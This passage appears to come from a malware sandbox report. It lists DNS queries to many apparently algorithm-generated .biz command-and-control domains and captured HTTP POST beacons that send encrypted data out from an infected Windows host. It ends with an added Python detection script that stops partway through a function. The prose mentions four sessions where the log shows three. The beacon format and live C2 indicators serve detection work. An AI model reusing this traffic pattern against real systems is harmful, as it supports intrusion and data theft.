                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:34.836111069 CET1.1.1.1192.168.2.100x525bNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.208373070 CET1.1.1.1192.168.2.100x36a4No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.406425953 CET1.1.1.1192.168.2.100x5d9No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.316154003 CET1.1.1.1192.168.2.100xb174No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.365062952 CET1.1.1.1192.168.2.100xfdf3No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.513343096 CET1.1.1.1192.168.2.100xdef6No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.710607052 CET1.1.1.1192.168.2.100x5a95No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.800278902 CET1.1.1.1192.168.2.100xc01No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.196460962 CET1.1.1.1192.168.2.100x9eddNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:47.828318119 CET1.1.1.1192.168.2.100xf083No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.616751909 CET1.1.1.1192.168.2.100xb015No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.616751909 CET1.1.1.1192.168.2.100xb015No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.767988920 CET1.1.1.1192.168.2.100xdde1No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.496588945 CET1.1.1.1192.168.2.100xf951No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.900337934 CET1.1.1.1192.168.2.100x6cfdNo error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.274933100 CET1.1.1.1192.168.2.100x45d0No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.054069042 CET1.1.1.1192.168.2.100xc875No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.736032009 CET1.1.1.1192.168.2.100xc5aaNo error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.467819929 CET1.1.1.1192.168.2.100xf02dNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.467819929 CET1.1.1.1192.168.2.100xf02dNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.720865011 CET1.1.1.1192.168.2.100xadf8No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.889076948 CET1.1.1.1192.168.2.100x3e96No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.111695051 CET1.1.1.1192.168.2.100xea69No error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.146229029 CET1.1.1.1192.168.2.100x8705No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.545670986 CET1.1.1.1192.168.2.100x91d6No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.632596970 CET1.1.1.1192.168.2.100x441fNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.669601917 CET1.1.1.1192.168.2.100x441fNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.200943947 CET1.1.1.1192.168.2.100x9b40No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.787127018 CET1.1.1.1192.168.2.100x873dNo error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.026611090 CET1.1.1.1192.168.2.100x3794No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.414278984 CET1.1.1.1192.168.2.100x30f4No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.414278984 CET1.1.1.1192.168.2.100x30f4No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.002253056 CET1.1.1.1192.168.2.100xa4beNo error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.497781992 CET1.1.1.1192.168.2.100xfe1cNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.770751953 CET1.1.1.1192.168.2.100x48dNo error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.226716995 CET1.1.1.1192.168.2.100x36bbNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.811748981 CET1.1.1.1192.168.2.100x7215No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.641566992 CET1.1.1.1192.168.2.100x97a7No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:14.059041977 CET1.1.1.1192.168.2.100xe6No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:15.790086031 CET1.1.1.1192.168.2.100xb2c6No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:16.562122107 CET1.1.1.1192.168.2.100x5a84No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:17.440872908 CET1.1.1.1192.168.2.100x2fc7No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:18.712189913 CET1.1.1.1192.168.2.100xf197No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:19.779220104 CET1.1.1.1192.168.2.100xaeb5No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:20.697655916 CET1.1.1.1192.168.2.100xb46No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:21.248863935 CET1.1.1.1192.168.2.100xbd07No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:22.702255011 CET1.1.1.1192.168.2.100x96b5No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:23.454368114 CET1.1.1.1192.168.2.100x3352No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.231652021 CET1.1.1.1192.168.2.100xa6e3No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.996251106 CET1.1.1.1192.168.2.100x69e9No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.912266970 CET1.1.1.1192.168.2.100xb496No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.157378912 CET1.1.1.1192.168.2.100x1137No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.389564037 CET1.1.1.1192.168.2.100xd07aNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.691343069 CET1.1.1.1192.168.2.100x48ebNo error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.814749002 CET1.1.1.1192.168.2.100xb99eNo error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.246371984 CET1.1.1.1192.168.2.100xf9bbNo error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.490750074 CET1.1.1.1192.168.2.100x6368No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
Nov 26, 2024 08:15:34.877976894 CET | 1.1.1.1 | 192.168.2.10 | 0xb0db | No error (0) | ftxlah.biz | 47.129.31.212 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:35.618021965 CET | 1.1.1.1 | 192.168.2.10 | 0x2446 | No error (0) | gvijgjwkh.biz | 3.94.10.34 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:37.253038883 CET | 1.1.1.1 | 192.168.2.10 | 0xa4e1 | No error (0) | typgfhb.biz | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:37.464234114 CET | 1.1.1.1 | 192.168.2.10 | 0x2df | No error (0) | qpnczch.biz | 18.246.231.120 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:39.556894064 CET | 1.1.1.1 | 192.168.2.10 | 0x85df | No error (0) | brsua.biz | 3.254.94.185 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:39.632268906 CET | 1.1.1.1 | 192.168.2.10 | 0x211e | No error (0) | esuzf.biz | 34.211.97.45 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:41.349776030 CET | 1.1.1.1 | 192.168.2.10 | 0x9a9a | No error (0) | gvijgjwkh.biz | 3.94.10.34 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:42.178401947 CET | 1.1.1.1 | 192.168.2.10 | 0x7f53 | No error (0) | dlynankz.biz | 85.214.228.140 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:42.178426981 CET | 1.1.1.1 | 192.168.2.10 | 0x7f53 | No error (0) | dlynankz.biz | 85.214.228.140 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:42.717278004 CET | 1.1.1.1 | 192.168.2.10 | 0xc21b | No error (0) | qpnczch.biz | 18.246.231.120 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:44.392349005 CET | 1.1.1.1 | 192.168.2.10 | 0xf9bb | No error (0) | brsua.biz | 3.254.94.185 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:44.533830881 CET | 1.1.1.1 | 192.168.2.10 | 0x6293 | No error (0) | oflybfv.biz | 47.129.31.212 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:46.144337893 CET | 1.1.1.1 | 192.168.2.10 | 0xc6f8 | No error (0) | dlynankz.biz | 85.214.228.140 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:47.287307024 CET | 1.1.1.1 | 192.168.2.10 | 0x1879 | No error (0) | yhqqc.biz | 34.211.97.45 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:48.421797991 CET | 1.1.1.1 | 192.168.2.10 | 0xc1ff | No error (0) | oflybfv.biz | 47.129.31.212 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:49.392945051 CET | 1.1.1.1 | 192.168.2.10 | 0x1ff5 | No error (0) | mnjmhp.biz | 47.129.31.212 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:50.748454094 CET | 1.1.1.1 | 192.168.2.10 | 0xc141 | No error (0) | yhqqc.biz | 34.211.97.45 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:52.110130072 CET | 1.1.1.1 | 192.168.2.10 | 0xf667 | No error (0) | opowhhece.biz | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:52.483119965 CET | 1.1.1.1 | 192.168.2.10 | 0xf24e | No error (0) | mnjmhp.biz | 47.129.31.212 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:54.401971102 CET | 1.1.1.1 | 192.168.2.10 | 0x1f08 | No error (0) | jdhhbs.biz | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:54.861344099 CET | 1.1.1.1 | 192.168.2.10 | 0xada | No error (0) | opowhhece.biz | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:56.424880981 CET | 1.1.1.1 | 192.168.2.10 | 0x517c | No error (0) | jdhhbs.biz | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:57.174324036 CET | 1.1.1.1 | 192.168.2.10 | 0x5efb | No error (0) | mgmsclkyu.biz | 34.246.200.160 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:58.843995094 CET | 1.1.1.1 | 192.168.2.10 | 0x451d | No error (0) | mgmsclkyu.biz | 34.246.200.160 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:15:59.334947109 CET | 1.1.1.1 | 192.168.2.10 | 0xb8eb | No error (0) | warkcdu.biz | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:00.541441917 CET | 1.1.1.1 | 192.168.2.10 | 0x25d9 | No error (0) | warkcdu.biz | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:02.129456997 CET | 1.1.1.1 | 192.168.2.10 | 0xb7ab | No error (0) | gcedd.biz | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:02.948649883 CET | 1.1.1.1 | 192.168.2.10 | 0x5cbe | No error (0) | gcedd.biz | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:05.826811075 CET | 1.1.1.1 | 192.168.2.10 | 0x46a1 | No error (0) | jwkoeoqns.biz | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:07.780375004 CET | 1.1.1.1 | 192.168.2.10 | 0xe917 | No error (0) | xccjj.biz | 18.246.231.120 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:08.158997059 CET | 1.1.1.1 | 192.168.2.10 | 0x2a1f | No error (0) | jwkoeoqns.biz | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:09.611032963 CET | 1.1.1.1 | 192.168.2.10 | 0x448d | No error (0) | xccjj.biz | 18.246.231.120 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:10.300951958 CET | 1.1.1.1 | 192.168.2.10 | 0x6d4b | No error (0) | hehckyov.biz | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:11.318342924 CET | 1.1.1.1 | 192.168.2.10 | 0x7826 | No error (0) | hehckyov.biz | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:12.160248041 CET | 1.1.1.1 | 192.168.2.10 | 0x57ad | No error (0) | rynmcq.biz | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:12.822451115 CET | 1.1.1.1 | 192.168.2.10 | 0x3a3c | No error (0) | rynmcq.biz | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:16:14.705224037 CET | 1.1.1.1 | 192.168.2.10 | 0x60ca | No error (0) | uaafd.biz | 3.254.94.185 | A (IP address) | IN (0x0001) | false
• gxe0.com
• api.ipify.org
• pywolwnvd.biz
• ssbzmoy.biz
• cvgrf.biz
• npukfztj.biz
• przvgke.biz
• knjghuig.biz
• lpuegx.biz
• vjaxhpbji.biz
• xlfhhhm.biz
• ifsaia.biz
• saytjshyf.biz
• vcddkls.biz
• fwiwk.biz
• tbjrpv.biz
• deoci.biz
• gytujflc.biz
• qaynky.biz
• bumxkqgxu.biz
• dwrqljrr.biz
• nqwjmb.biz
• ytctnunms.biz
• myups.biz
• oshhkdluh.biz
• yunalwv.biz
• jpskm.biz
• lrxdmhrr.biz
• wllvnzb.biz
• gnqgo.biz
• jhvzpcfg.biz
• acwjcqqv.biz
• vyome.biz
• yauexmxk.biz
• iuzpxe.biz
• sxmiywsfv.biz
• vrrazpdh.biz
• ftxlah.biz
• typgfhb.biz
• esuzf.biz
• gvijgjwkh.biz
• qpnczch.biz
• brsua.biz
• dlynankz.biz
• oflybfv.biz
• yhqqc.biz
• mnjmhp.biz
• opowhhece.biz
• jdhhbs.biz
• mgmsclkyu.biz
• warkcdu.biz
• gcedd.biz
• jwkoeoqns.biz
• xccjj.biz
• hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                    • rynmcq.biz
Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49744        54.244.188.177  80                3976  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp / Bytes transferred / Direction, followed by the data sent:

Nov 26, 2024 08:12:27.092875957 CET  359 bytes  OUT
    POST /omhtttbpfwdopn HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 836
Nov 26, 2024 08:12:27.092942953 CET  836 bytes  OUT
    Data Raw: cb 4c 5a af a4 96 3d 03 38 03 00 00 7d d3 6c 1c b4 70 af 1f 40 63 a8 ba c3 11 a4 2d ab 11 42 ec 16 2f 2f 43 93 91 05 e6 0f 81 4c 66 e7 28 f6 39 ae d3 72 cb 8e 8b eb ab 01 b6 bf 1c e4 4d a9 03 02 ab 88 70 5d 90 06 8a 66 e3 90 e8 0b 8e a8 ad af 1a
    Data Ascii: LZ=8}lp@c-B//CLf(9rMp]fOgU8+IJn@8|\'8C:kl{8w2WIr^-Qd!n%SSUHN_8'HWW,UoBY0<l]hqoC)^NikbE
Nov 26, 2024 08:12:28.466295958 CET  411 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:12:28 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=352235faf8ce283a8ea2681fd48cc548|8.46.123.75|1732605148|1732605148|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.10  49753        54.244.188.177  80                6072  C:\Windows\System32\alg.exe

Timestamp / Bytes transferred / Direction, followed by the data sent:

Nov 26, 2024 08:12:30.031168938 CET  361 bytes  OUT
    POST /ulvxycyjutwdmypq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:12:30.031202078 CET  778 bytes  OUT
    Data Raw: e0 fe e1 f1 47 a4 a3 d3 fe 02 00 00 41 e2 62 77 e4 94 2c 40 bd 21 93 f7 05 3d 0a 6c 55 c2 6e 9d 4c a0 39 cc 56 fa bf 1f 19 f0 58 1f 78 fe 4b 54 c4 0c 61 9c 4b a8 20 2e 70 aa 79 31 4c aa 88 9c 4f 10 55 43 52 23 a8 43 b7 19 08 1b c1 54 0b 95 36 15
    Data Ascii: GAbw,@!=lUnL9VXxKTaK .py1LOUCR#CT6s^HQf{9QOtgXEqr'p%hX4o8&iz5 UE^rnS-in?;Tpq@(#0^`tPb;Vbpn!'OpW%zgp0}S
Nov 26, 2024 08:12:31.363255978 CET  411 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:12:31 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=a2e1e2d1b8ef6c9be00659336ce81aa8|8.46.123.75|1732605151|1732605151|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.10  49757        18.141.10.107   80                3976  C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp / Bytes transferred / Direction, followed by the data sent:

Nov 26, 2024 08:12:30.386816978 CET  350 bytes  OUT
    POST /nkbiquv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 836
Nov 26, 2024 08:12:30.386866093 CET  836 bytes  OUT
    Data Raw: b4 b4 20 4a 70 3e 7e 75 38 03 00 00 73 ed 73 5e 33 50 ff 21 a2 11 a6 21 04 47 36 3a 9b bd d1 20 08 17 74 b6 e4 be 60 63 b2 d6 ca 71 39 0f eb ae f6 e9 99 70 a1 c0 36 9c de 44 cd c5 4b 15 fe 53 c1 9c 45 cc cc 29 6e 5a 07 64 90 4a f8 c7 3b ce 4f 90
    Data Ascii: Jp>~u8ss^3P!!G6: t`cq9p6DKSE)nZdJ;OGXfmA&,7*49KU5O>ou!&TR.W5#3FldE7SB>g6RyVNA1ulO<ktT 'm!T& m
Nov 26, 2024 08:12:32.504640102 CET  409 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:12:32 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=e2c0a272392a91dbb98a44f2a3d1e9f0|8.46.123.75|1732605152|1732605152|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
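The four POSTs above share one shape: a random lowercase path on a randomly named .biz host, a WindowsWechat/QQBrowser User-Agent, no-cache headers, an opaque binary body, and a 200 OK with an empty chunked body that only sets btst/snkz cookies. The bodies also share a detail worth checking: in every captured body the little-endian 32-bit value at offset 8 equals Content-Length minus 12 (0x338 = 824 for the 836-byte bodies, 0x2fe = 766 for the 778-byte ones), while the first 8 bytes differ per request. The script below is an added example, not Joe Sandbox code and not the malware's own, that scores the captured sessions and the queried domain list against those indicators. It assumes: the header strings reproduced from the report (cookie Expires attributes omitted), the 12-byte-header reading as a hypothesis from these four bodies only, DGA/path regexes fitted to the names seen here, and a constructed benign control session that must not fire.

```python
"""Flag the HTTP beacon pattern in the sessions above (added example, not report code).

Header strings are reproduced from the captured sessions; each body_prefix is the
first 12 bytes shown under "Data Raw". Reading bytes 8..11 as a little-endian
length is a hypothesis drawn from those four bodies only; CONTROL is constructed.
"""
from __future__ import annotations

import re
from typing import NamedTuple

class Session(NamedTuple):
    dst_ip: str
    request: str        # raw request headers, CRLF separated
    body_prefix: bytes  # first bytes of the POST body
    response: str       # raw response headers ("" if not captured)

# User-Agent every captured beacon sends (copied from the report).
UA_IOC = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
          "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
          "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
# Shape heuristics fitted to the names in this report; tune before production use.
DGA_HOST = re.compile(r"^[a-z]{5,9}\.biz$")
RANDOM_PATH = re.compile(r"^/[a-z]{7,16}$")
# Domains from the list above.
DOMAINS = ["dlynankz.biz", "oflybfv.biz", "yhqqc.biz", "mnjmhp.biz", "opowhhece.biz",
           "jdhhbs.biz", "mgmsclkyu.biz", "warkcdu.biz", "gcedd.biz", "jwkoeoqns.biz",
           "xccjj.biz", "hehckyov.biz", "rynmcq.biz"]

def beacon_request(path: str, host: str, clen: int) -> str:
    """Request headers as the captured beacons send them."""
    return (f"POST {path} HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
            f"Pragma: no-cache\r\nHost: {host}\r\nUser-Agent: {UA_IOC}\r\n"
            f"Content-Length: {clen}\r\n\r\n")

def c2_response(host: str, btst: str) -> str:
    """Response headers as captured: 200 OK, empty chunked body, btst/snkz cookies."""
    return (f"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n"
            f"Transfer-Encoding: chunked\r\nConnection: close\r\n"
            f"Set-Cookie: btst={btst}; path=/; domain=.{host}; HttpOnly; SameSite=Lax;\r\n"
            f"Set-Cookie: snkz=8.46.123.75; path=/\r\n\r\n")

SESSIONS = [
    Session("54.244.188.177", beacon_request("/omhtttbpfwdopn", "pywolwnvd.biz", 836),
            bytes.fromhex("cb4c5aafa4963d0338030000"), c2_response("pywolwnvd.biz",
            "352235faf8ce283a8ea2681fd48cc548|8.46.123.75|1732605148|1732605148|0|1|0")),
    Session("54.244.188.177", beacon_request("/ulvxycyjutwdmypq", "pywolwnvd.biz", 778),
            bytes.fromhex("e0fee1f147a4a3d3fe020000"), c2_response("pywolwnvd.biz",
            "a2e1e2d1b8ef6c9be00659336ce81aa8|8.46.123.75|1732605151|1732605151|0|1|0")),
    Session("18.141.10.107", beacon_request("/nkbiquv", "ssbzmoy.biz", 836),
            bytes.fromhex("b4b4204a703e7e7538030000"), c2_response("ssbzmoy.biz",
            "e2c0a272392a91dbb98a44f2a3d1e9f0|8.46.123.75|1732605152|1732605152|0|1|0")),
    Session("18.141.10.107", beacon_request("/eupqxdgegqjrgdpv", "ssbzmoy.biz", 778),
            bytes.fromhex("3127e9e1a9f3249afe020000"), ""),  # response not in the excerpt
]
# Constructed benign control: an ordinary JSON upload that must not fire.
CONTROL = Session("203.0.113.5",
                  "POST /api/v1/upload HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/8.4.0\r\n"
                  "Content-Type: application/json\r\nContent-Length: 27\r\n\r\n",
                  b'{"name":"bob', "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n")

def parse_headers(raw: str) -> tuple[str, dict[str, list[str]]]:
    """Split a header block into its start line and a lower-cased name -> values map."""
    lines = raw.strip("\r\n").split("\r\n")
    headers = {}
    for line in lines[1:]:
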